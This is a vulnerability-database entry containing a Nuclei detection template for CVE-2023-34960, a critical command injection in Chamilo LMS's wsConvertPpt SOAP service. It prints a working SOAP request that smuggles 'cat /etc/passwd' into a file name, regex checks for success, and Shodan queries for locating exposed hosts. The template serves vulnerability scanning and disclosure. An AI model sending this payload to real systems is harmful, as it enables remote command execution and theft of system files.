Chamilo Command Injection

2023-06-1617:12:10

ProjectDiscovery

github.com

chamilo

command injection

cve-2023-34960

soap api

data leakage

unauthorized access

security patch

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.901

Percentile

98.9%

JSON

A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.

id: CVE-2023-34960

info:
  name: Chamilo Command Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS.
  reference:
    - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D
    - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py
    - http://chamilo.com
    - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html
    - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34960
    cwe-id: CWE-77
    epss-score: 0.93314
    epss-percentile: 0.99067
    cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: chamilo
    product: chamilo
    shodan-query:
      - http.component:"Chamilo"
      - http.component:"chamilo"
      - cpe:"cpe:2.3:a:chamilo:chamilo"
  tags: cve,cve2023,packetstorm,chamilo

http:
  - raw:
      - |
        POST /main/webservices/additional_webservices.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=utf-8

        <?xml version="1.0" encoding="UTF-8"?>
        <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

      - type: word
        part: header
        words:
          - text/xml

      - type: status
        status:
          - 200
# digest: 4a0a00473045022066af9a14b5d4b46b5206573d4676499c39fb49182e834c8aabb6598e4d25330c022100fd5577b9bd3944c2d1fc1cfbdcfe4804e18b88ef0296e85bfc8d26d3f62e55bd:922c64590222798bb761d5b6d8e72950